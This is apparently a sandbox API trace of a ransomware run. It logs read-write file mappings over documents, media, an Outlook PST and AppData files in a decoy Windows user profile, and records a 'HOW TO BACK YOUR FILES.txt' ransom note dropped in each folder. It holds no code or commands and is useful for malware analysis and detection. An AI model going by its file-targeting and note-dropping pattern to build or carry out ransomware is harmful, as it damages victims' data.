Create Mapping C:\Users\FD1HVy\Documents\u-1JZ4Ru824_HpbNp\EYPPTs4FJO\b3 L_8Aww3.ods filename = C:\Users\FD1HVy\Documents\u-1JZ4Ru824_HpbNp\EYPPTs4FJO\b3 L_8Aww3.ods, protection = PAGE_READWRITE, maximum_size = 103152 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\u-1JZ4Ru824_HpbNp\EYPPTs4FJO\c9HUgPMn.rtf filename = C:\Users\FD1HVy\Documents\u-1JZ4Ru824_HpbNp\EYPPTs4FJO\c9HUgPMn.rtf, protection = PAGE_READWRITE, maximum_size = 50416 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\u-1JZ4Ru824_HpbNp\EYPPTs4FJO\h_uO.xls filename = C:\Users\FD1HVy\Documents\u-1JZ4Ru824_HpbNp\EYPPTs4FJO\h_uO.xls, protection = PAGE_READWRITE, maximum_size = 18784 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\u-1JZ4Ru824_HpbNp\EYPPTs4FJO\SBk5RPRd5SSmk r6MsO.pptx filename = C:\Users\FD1HVy\Documents\u-1JZ4Ru824_HpbNp\EYPPTs4FJO\SBk5RPRd5SSmk r6MsO.pptx, protection = PAGE_READWRITE, maximum_size = 31504 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\u-1JZ4Ru824_HpbNp\EYPPTs4FJO\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Documents\u-1JZ4Ru824_HpbNp\EYPPTs4FJO\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\u-1JZ4Ru824_HpbNp\EYPPTs4FJO\MMADP1Sx8P2k7\5UIIwxxuSCwYbi_fDL.odp filename = C:\Users\FD1HVy\Documents\u-1JZ4Ru824_HpbNp\EYPPTs4FJO\MMADP1Sx8P2k7\5UIIwxxuSCwYbi_fDL.odp, protection = PAGE_READWRITE, maximum_size = 52912 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\u-1JZ4Ru824_HpbNp\EYPPTs4FJO\MMADP1Sx8P2k7\6lADbwLmhMb6k2_hQ.csv filename = C:\Users\FD1HVy\Documents\u-1JZ4Ru824_HpbNp\EYPPTs4FJO\MMADP1Sx8P2k7\6lADbwLmhMb6k2_hQ.csv, protection = PAGE_READWRITE, maximum_size = 54000 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\u-1JZ4Ru824_HpbNp\EYPPTs4FJO\MMADP1Sx8P2k7\9VM43enKtBNnJ.ppt filename = C:\Users\FD1HVy\Documents\u-1JZ4Ru824_HpbNp\EYPPTs4FJO\MMADP1Sx8P2k7\9VM43enKtBNnJ.ppt, protection = PAGE_READWRITE, maximum_size = 24352 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\u-1JZ4Ru824_HpbNp\EYPPTs4FJO\MMADP1Sx8P2k7\HLSmokW YeF9u.odt filename = C:\Users\FD1HVy\Documents\u-1JZ4Ru824_HpbNp\EYPPTs4FJO\MMADP1Sx8P2k7\HLSmokW YeF9u.odt, protection = PAGE_READWRITE, maximum_size = 23456 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\u-1JZ4Ru824_HpbNp\EYPPTs4FJO\MMADP1Sx8P2k7\I4xTf-C.odp filename = C:\Users\FD1HVy\Documents\u-1JZ4Ru824_HpbNp\EYPPTs4FJO\MMADP1Sx8P2k7\I4xTf-C.odp, protection = PAGE_READWRITE, maximum_size = 31136 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\u-1JZ4Ru824_HpbNp\EYPPTs4FJO\MMADP1Sx8P2k7\V aDNuCa.xlsx filename = C:\Users\FD1HVy\Documents\u-1JZ4Ru824_HpbNp\EYPPTs4FJO\MMADP1Sx8P2k7\V aDNuCa.xlsx, protection = PAGE_READWRITE, maximum_size = 49344 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\u-1JZ4Ru824_HpbNp\EYPPTs4FJO\MMADP1Sx8P2k7\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Documents\u-1JZ4Ru824_HpbNp\EYPPTs4FJO\MMADP1Sx8P2k7\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\u-1JZ4Ru824_HpbNp\D8mmMQeHMrSqYz8UevK\1pNb.docx filename = C:\Users\FD1HVy\Documents\u-1JZ4Ru824_HpbNp\D8mmMQeHMrSqYz8UevK\1pNb.docx, protection = PAGE_READWRITE, maximum_size = 57040 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\u-1JZ4Ru824_HpbNp\D8mmMQeHMrSqYz8UevK\gE99JrIwutT0tFxNz.odt filename = C:\Users\FD1HVy\Documents\u-1JZ4Ru824_HpbNp\D8mmMQeHMrSqYz8UevK\gE99JrIwutT0tFxNz.odt, protection = PAGE_READWRITE, maximum_size = 28224 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\u-1JZ4Ru824_HpbNp\D8mmMQeHMrSqYz8UevK\GVj2hhi0gvWSRVrHTCP.pps filename = C:\Users\FD1HVy\Documents\u-1JZ4Ru824_HpbNp\D8mmMQeHMrSqYz8UevK\GVj2hhi0gvWSRVrHTCP.pps, protection = PAGE_READWRITE, maximum_size = 97680 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\u-1JZ4Ru824_HpbNp\D8mmMQeHMrSqYz8UevK\MRzyzETcP.odt filename = C:\Users\FD1HVy\Documents\u-1JZ4Ru824_HpbNp\D8mmMQeHMrSqYz8UevK\MRzyzETcP.odt, protection = PAGE_READWRITE, maximum_size = 82640 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\u-1JZ4Ru824_HpbNp\D8mmMQeHMrSqYz8UevK\Q7T abSZv.ots filename = C:\Users\FD1HVy\Documents\u-1JZ4Ru824_HpbNp\D8mmMQeHMrSqYz8UevK\Q7T abSZv.ots, protection = PAGE_READWRITE, maximum_size = 61456 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\u-1JZ4Ru824_HpbNp\D8mmMQeHMrSqYz8UevK\r c_-ee.xls filename = C:\Users\FD1HVy\Documents\u-1JZ4Ru824_HpbNp\D8mmMQeHMrSqYz8UevK\r c_-ee.xls, protection = PAGE_READWRITE, maximum_size = 44752 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\u-1JZ4Ru824_HpbNp\D8mmMQeHMrSqYz8UevK\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Documents\u-1JZ4Ru824_HpbNp\D8mmMQeHMrSqYz8UevK\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\Outlook Files\kkcie@kdj.kd.pst filename = C:\Users\FD1HVy\Documents\Outlook Files\kkcie@kdj.kd.pst, protection = PAGE_READWRITE, maximum_size = 272128 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\Outlook Files\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Documents\Outlook Files\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\My Shapes\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Documents\My Shapes\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\My Shapes\_private\folder.ico filename = C:\Users\FD1HVy\Documents\My Shapes\_private\folder.ico, protection = PAGE_READWRITE, maximum_size = 30704 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\My Shapes\_private\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Documents\My Shapes\_private\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\6XPv\_kq3J7tr.doc filename = C:\Users\FD1HVy\Documents\6XPv\_kq3J7tr.doc, protection = PAGE_READWRITE, maximum_size = 63168 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\6XPv\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Documents\6XPv\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\6XPv\9FpAh6TVjmxPhP\-aRcJA7jEmHzJ7r.ots filename = C:\Users\FD1HVy\Documents\6XPv\9FpAh6TVjmxPhP\-aRcJA7jEmHzJ7r.ots, protection = PAGE_READWRITE, maximum_size = 49424 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\6XPv\9FpAh6TVjmxPhP\81WfwdP.ppt filename = C:\Users\FD1HVy\Documents\6XPv\9FpAh6TVjmxPhP\81WfwdP.ppt, protection = PAGE_READWRITE, maximum_size = 58992 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\6XPv\9FpAh6TVjmxPhP\fHQ QkkX1TmC5OV.pdf filename = C:\Users\FD1HVy\Documents\6XPv\9FpAh6TVjmxPhP\fHQ QkkX1TmC5OV.pdf, protection = PAGE_READWRITE, maximum_size = 48976 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\6XPv\9FpAh6TVjmxPhP\mqnlW3rVySKpkYtm8O.odt filename = C:\Users\FD1HVy\Documents\6XPv\9FpAh6TVjmxPhP\mqnlW3rVySKpkYtm8O.odt, protection = PAGE_READWRITE, maximum_size = 76416 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\6XPv\9FpAh6TVjmxPhP\OL28qnWw4 WVd5.pdf filename = C:\Users\FD1HVy\Documents\6XPv\9FpAh6TVjmxPhP\OL28qnWw4 WVd5.pdf, protection = PAGE_READWRITE, maximum_size = 102512 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\6XPv\9FpAh6TVjmxPhP\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Documents\6XPv\9FpAh6TVjmxPhP\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\49_hdOHrBSo9\DKUItMdMv.csv filename = C:\Users\FD1HVy\Documents\49_hdOHrBSo9\DKUItMdMv.csv, protection = PAGE_READWRITE, maximum_size = 66880 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\49_hdOHrBSo9\PPT9PcnpxhtaoWPAl.ots filename = C:\Users\FD1HVy\Documents\49_hdOHrBSo9\PPT9PcnpxhtaoWPAl.ots, protection = PAGE_READWRITE, maximum_size = 97616 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\49_hdOHrBSo9\tlQ2QreLWNw1C.ots filename = C:\Users\FD1HVy\Documents\49_hdOHrBSo9\tlQ2QreLWNw1C.ots, protection = PAGE_READWRITE, maximum_size = 71696 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\49_hdOHrBSo9\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Documents\49_hdOHrBSo9\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\49_hdOHrBSo9\yaO0UrYZwssx3x\-fpJmWMI.docx filename = C:\Users\FD1HVy\Documents\49_hdOHrBSo9\yaO0UrYZwssx3x\-fpJmWMI.docx, protection = PAGE_READWRITE, maximum_size = 9728 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\49_hdOHrBSo9\yaO0UrYZwssx3x\-JwUYt-2tOoXas.ods filename = C:\Users\FD1HVy\Documents\49_hdOHrBSo9\yaO0UrYZwssx3x\-JwUYt-2tOoXas.ods, protection = PAGE_READWRITE, maximum_size = 93296 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\49_hdOHrBSo9\yaO0UrYZwssx3x\F _E.ods filename = C:\Users\FD1HVy\Documents\49_hdOHrBSo9\yaO0UrYZwssx3x\F _E.ods, protection = PAGE_READWRITE, maximum_size = 102112 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\49_hdOHrBSo9\yaO0UrYZwssx3x\gFCS.odt filename = C:\Users\FD1HVy\Documents\49_hdOHrBSo9\yaO0UrYZwssx3x\gFCS.odt, protection = PAGE_READWRITE, maximum_size = 46928 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\49_hdOHrBSo9\yaO0UrYZwssx3x\YwT0L2uHZ5 4t5VAQEl.odp filename = C:\Users\FD1HVy\Documents\49_hdOHrBSo9\yaO0UrYZwssx3x\YwT0L2uHZ5 4t5VAQEl.odp, protection = PAGE_READWRITE, maximum_size = 91408 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\49_hdOHrBSo9\yaO0UrYZwssx3x\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Documents\49_hdOHrBSo9\yaO0UrYZwssx3x\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\49_hdOHrBSo9\uTNr\oqmQZYL-UF.pps filename = C:\Users\FD1HVy\Documents\49_hdOHrBSo9\uTNr\oqmQZYL-UF.pps, protection = PAGE_READWRITE, maximum_size = 13168 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\49_hdOHrBSo9\uTNr\rZAFx7yv0j4OpKr0.rtf filename = C:\Users\FD1HVy\Documents\49_hdOHrBSo9\uTNr\rZAFx7yv0j4OpKr0.rtf, protection = PAGE_READWRITE, maximum_size = 3792 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\49_hdOHrBSo9\uTNr\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Documents\49_hdOHrBSo9\uTNr\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\2-Z3wOJH3aw8Gc23B.m4a filename = C:\Users\FD1HVy\Desktop\2-Z3wOJH3aw8Gc23B.m4a, protection = PAGE_READWRITE, maximum_size = 26960 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\41qdC6QgBU.flv filename = C:\Users\FD1HVy\Desktop\41qdC6QgBU.flv, protection = PAGE_READWRITE, maximum_size = 84640 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\4F1Tg Snje_K.m4a filename = C:\Users\FD1HVy\Desktop\4F1Tg Snje_K.m4a, protection = PAGE_READWRITE, maximum_size = 42032 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\4OW_EMMxH1R6Pq3.gif filename = C:\Users\FD1HVy\Desktop\4OW_EMMxH1R6Pq3.gif, protection = PAGE_READWRITE, maximum_size = 100096 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\7qqNe7s7XL.bmp filename = C:\Users\FD1HVy\Desktop\7qqNe7s7XL.bmp, protection = PAGE_READWRITE, maximum_size = 26496 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\8KsFVV OpOh6.gif filename = C:\Users\FD1HVy\Desktop\8KsFVV OpOh6.gif, protection = PAGE_READWRITE, maximum_size = 5616 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\anMNjT J.avi filename = C:\Users\FD1HVy\Desktop\anMNjT J.avi, protection = PAGE_READWRITE, maximum_size = 96448 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\C6uP5iN6LVPrE8U.bmp filename = C:\Users\FD1HVy\Desktop\C6uP5iN6LVPrE8U.bmp, protection = PAGE_READWRITE, maximum_size = 66016 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\ClJz2xAW_8zhk38m.mp4 filename = C:\Users\FD1HVy\Desktop\ClJz2xAW_8zhk38m.mp4, protection = PAGE_READWRITE, maximum_size = 69232 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\D lSV8sh3seQkpeGf8.ods filename = C:\Users\FD1HVy\Desktop\D lSV8sh3seQkpeGf8.ods, protection = PAGE_READWRITE, maximum_size = 29456 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\ewezVPkDgW.avi filename = C:\Users\FD1HVy\Desktop\ewezVPkDgW.avi, protection = PAGE_READWRITE, maximum_size = 59696 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\G0J-6mO5v.avi filename = C:\Users\FD1HVy\Desktop\G0J-6mO5v.avi, protection = PAGE_READWRITE, maximum_size = 99408 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\GOw9MGna.png filename = C:\Users\FD1HVy\Desktop\GOw9MGna.png, protection = PAGE_READWRITE, maximum_size = 23024 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\GsuT4BW5pRWHUukU9.mkv filename = C:\Users\FD1HVy\Desktop\GsuT4BW5pRWHUukU9.mkv, protection = PAGE_READWRITE, maximum_size = 12912 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\KSzlu5oxR5sFseX2y0.png filename = C:\Users\FD1HVy\Desktop\KSzlu5oxR5sFseX2y0.png, protection = PAGE_READWRITE, maximum_size = 93248 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\la3j1A5Jj.mp4 filename = C:\Users\FD1HVy\Desktop\la3j1A5Jj.mp4, protection = PAGE_READWRITE, maximum_size = 66736 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\LnvDKMi.gif filename = C:\Users\FD1HVy\Desktop\LnvDKMi.gif, protection = PAGE_READWRITE, maximum_size = 62592 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\m1HgOc.bmp filename = C:\Users\FD1HVy\Desktop\m1HgOc.bmp, protection = PAGE_READWRITE, maximum_size = 96800 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\N3hw-iK.m4a filename = C:\Users\FD1HVy\Desktop\N3hw-iK.m4a, protection = PAGE_READWRITE, maximum_size = 37408 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\PT36K2PFOA8Wd0big.wav filename = C:\Users\FD1HVy\Desktop\PT36K2PFOA8Wd0big.wav, protection = PAGE_READWRITE, maximum_size = 11184 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\qd_icl1FnCPEAdw.mp3 filename = C:\Users\FD1HVy\Desktop\qd_icl1FnCPEAdw.mp3, protection = PAGE_READWRITE, maximum_size = 98080 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\qRlW8xjuiQwW5.bmp filename = C:\Users\FD1HVy\Desktop\qRlW8xjuiQwW5.bmp, protection = PAGE_READWRITE, maximum_size = 27632 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\rlF-zhRIKD7PdF8Xi0UD.m4a filename = C:\Users\FD1HVy\Desktop\rlF-zhRIKD7PdF8Xi0UD.m4a, protection = PAGE_READWRITE, maximum_size = 39232 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\SIddsZ.ppt filename = C:\Users\FD1HVy\Desktop\SIddsZ.ppt, protection = PAGE_READWRITE, maximum_size = 80608 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\ssoUEo7W-0UrZF.mp3 filename = C:\Users\FD1HVy\Desktop\ssoUEo7W-0UrZF.mp3, protection = PAGE_READWRITE, maximum_size = 88672 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\UdqNl Lu10Gn.xls filename = C:\Users\FD1HVy\Desktop\UdqNl Lu10Gn.xls, protection = PAGE_READWRITE, maximum_size = 73184 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\Ur9UXi87PYp.bmp filename = C:\Users\FD1HVy\Desktop\Ur9UXi87PYp.bmp, protection = PAGE_READWRITE, maximum_size = 13792 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\wbsZjt46N6Bq440.avi filename = C:\Users\FD1HVy\Desktop\wbsZjt46N6Bq440.avi, protection = PAGE_READWRITE, maximum_size = 83968 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\x-r-NNo.xls filename = C:\Users\FD1HVy\Desktop\x-r-NNo.xls, protection = PAGE_READWRITE, maximum_size = 96432 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\XCT6Fbj.odt filename = C:\Users\FD1HVy\Desktop\XCT6Fbj.odt, protection = PAGE_READWRITE, maximum_size = 65920 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\yCE8TOTz8j0hoj8IV.png filename = C:\Users\FD1HVy\Desktop\yCE8TOTz8j0hoj8IV.png, protection = PAGE_READWRITE, maximum_size = 12176 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\ZzG5k.m4a filename = C:\Users\FD1HVy\Desktop\ZzG5k.m4a, protection = PAGE_READWRITE, maximum_size = 22288 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Desktop\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\UlU8B2wEqPRo\B66_a.gif filename = C:\Users\FD1HVy\Desktop\UlU8B2wEqPRo\B66_a.gif, protection = PAGE_READWRITE, maximum_size = 84368 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\UlU8B2wEqPRo\BZhPxLldD zvXbBb.bmp filename = C:\Users\FD1HVy\Desktop\UlU8B2wEqPRo\BZhPxLldD zvXbBb.bmp, protection = PAGE_READWRITE, maximum_size = 71232 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\UlU8B2wEqPRo\fmLa.jpg filename = C:\Users\FD1HVy\Desktop\UlU8B2wEqPRo\fmLa.jpg, protection = PAGE_READWRITE, maximum_size = 95056 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\UlU8B2wEqPRo\mh4EU.ots filename = C:\Users\FD1HVy\Desktop\UlU8B2wEqPRo\mh4EU.ots, protection = PAGE_READWRITE, maximum_size = 52832 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\UlU8B2wEqPRo\p8YxsrELn8XKWAj6S.mp4 filename = C:\Users\FD1HVy\Desktop\UlU8B2wEqPRo\p8YxsrELn8XKWAj6S.mp4, protection = PAGE_READWRITE, maximum_size = 4016 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\UlU8B2wEqPRo\qoUYKef.mp4 filename = C:\Users\FD1HVy\Desktop\UlU8B2wEqPRo\qoUYKef.mp4, protection = PAGE_READWRITE, maximum_size = 25376 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\UlU8B2wEqPRo\qRf30E0va-Q5qcX8J.mp3 filename = C:\Users\FD1HVy\Desktop\UlU8B2wEqPRo\qRf30E0va-Q5qcX8J.mp3, protection = PAGE_READWRITE, maximum_size = 3264 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\UlU8B2wEqPRo\rsSN39k30qsRCD.m4a filename = C:\Users\FD1HVy\Desktop\UlU8B2wEqPRo\rsSN39k30qsRCD.m4a, protection = PAGE_READWRITE, maximum_size = 101632 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\UlU8B2wEqPRo\SabX6Zgr AAwOd.jpg filename = C:\Users\FD1HVy\Desktop\UlU8B2wEqPRo\SabX6Zgr AAwOd.jpg, protection = PAGE_READWRITE, maximum_size = 45488 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\UlU8B2wEqPRo\u-KUQZAFiS.jpg filename = C:\Users\FD1HVy\Desktop\UlU8B2wEqPRo\u-KUQZAFiS.jpg, protection = PAGE_READWRITE, maximum_size = 33008 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\UlU8B2wEqPRo\WcVaPByj3hFUdu9J.wav filename = C:\Users\FD1HVy\Desktop\UlU8B2wEqPRo\WcVaPByj3hFUdu9J.wav, protection = PAGE_READWRITE, maximum_size = 88672 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\UlU8B2wEqPRo\YFZqM1OxNBw9.m4a filename = C:\Users\FD1HVy\Desktop\UlU8B2wEqPRo\YFZqM1OxNBw9.m4a, protection = PAGE_READWRITE, maximum_size = 92320 True 1
Fn
Create Mapping C:\Users\FD1HVy\Desktop\UlU8B2wEqPRo\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Desktop\UlU8B2wEqPRo\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Contacts\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Contacts\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\0UQahDxA.m4a filename = C:\Users\FD1HVy\AppData\Roaming\0UQahDxA.m4a, protection = PAGE_READWRITE, maximum_size = 12688 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\2oLQAuOM3KfTs0.odt filename = C:\Users\FD1HVy\AppData\Roaming\2oLQAuOM3KfTs0.odt, protection = PAGE_READWRITE, maximum_size = 94064 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\88ufiGMYBLxXyRM.wav filename = C:\Users\FD1HVy\AppData\Roaming\88ufiGMYBLxXyRM.wav, protection = PAGE_READWRITE, maximum_size = 68576 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\8_EFGX27w7PcwVcM.flv filename = C:\Users\FD1HVy\AppData\Roaming\8_EFGX27w7PcwVcM.flv, protection = PAGE_READWRITE, maximum_size = 33584 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\B3oYZNTXYVTXgAyXg.mp4 filename = C:\Users\FD1HVy\AppData\Roaming\B3oYZNTXYVTXgAyXg.mp4, protection = PAGE_READWRITE, maximum_size = 62976 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\BYMMds-tqy3Cr.wav filename = C:\Users\FD1HVy\AppData\Roaming\BYMMds-tqy3Cr.wav, protection = PAGE_READWRITE, maximum_size = 98320 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Ce_n4dDEp l89.mp4 filename = C:\Users\FD1HVy\AppData\Roaming\Ce_n4dDEp l89.mp4, protection = PAGE_READWRITE, maximum_size = 40976 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\CiU0ITa 8V.mp3 filename = C:\Users\FD1HVy\AppData\Roaming\CiU0ITa 8V.mp3, protection = PAGE_READWRITE, maximum_size = 4272 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\CmAysGSMk0dmaqiVK-.m4a filename = C:\Users\FD1HVy\AppData\Roaming\CmAysGSMk0dmaqiVK-.m4a, protection = PAGE_READWRITE, maximum_size = 35312 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\cNKcSEPhOVBzCC-S.swf filename = C:\Users\FD1HVy\AppData\Roaming\cNKcSEPhOVBzCC-S.swf, protection = PAGE_READWRITE, maximum_size = 47632 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\CtsQxlryTc-FvxwK4.mp3 filename = C:\Users\FD1HVy\AppData\Roaming\CtsQxlryTc-FvxwK4.mp3, protection = PAGE_READWRITE, maximum_size = 60688 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\DcYe75yxfBjHF71TD.pptx filename = C:\Users\FD1HVy\AppData\Roaming\DcYe75yxfBjHF71TD.pptx, protection = PAGE_READWRITE, maximum_size = 9456 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\EJrA1rdWo4.png filename = C:\Users\FD1HVy\AppData\Roaming\EJrA1rdWo4.png, protection = PAGE_READWRITE, maximum_size = 90160 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\FqChn0.mkv filename = C:\Users\FD1HVy\AppData\Roaming\FqChn0.mkv, protection = PAGE_READWRITE, maximum_size = 84880 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\GlZY7.mp3 filename = C:\Users\FD1HVy\AppData\Roaming\GlZY7.mp3, protection = PAGE_READWRITE, maximum_size = 32640 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\hWfeMbbEV8M9x35_Hd8.png filename = C:\Users\FD1HVy\AppData\Roaming\hWfeMbbEV8M9x35_Hd8.png, protection = PAGE_READWRITE, maximum_size = 42432 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\J9xGx_zgbd5MhMcXW.ods filename = C:\Users\FD1HVy\AppData\Roaming\J9xGx_zgbd5MhMcXW.ods, protection = PAGE_READWRITE, maximum_size = 67616 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\Knzg8bpR2isDXnxTV.m4a filename = C:\Users\FD1HVy\AppData\Roaming\Knzg8bpR2isDXnxTV.m4a, protection = PAGE_READWRITE, maximum_size = 55008 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\N4 X-9_q.avi filename = C:\Users\FD1HVy\AppData\Roaming\N4 X-9_q.avi, protection = PAGE_READWRITE, maximum_size = 69456 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Roaming\N8MfSDtCG2.avi filename = C:\Users\FD1HVy\AppData\Roaming\N8MfSDtCG2.avi, protection = PAGE_READWRITE, maximum_size = 90000 True 1
Fn
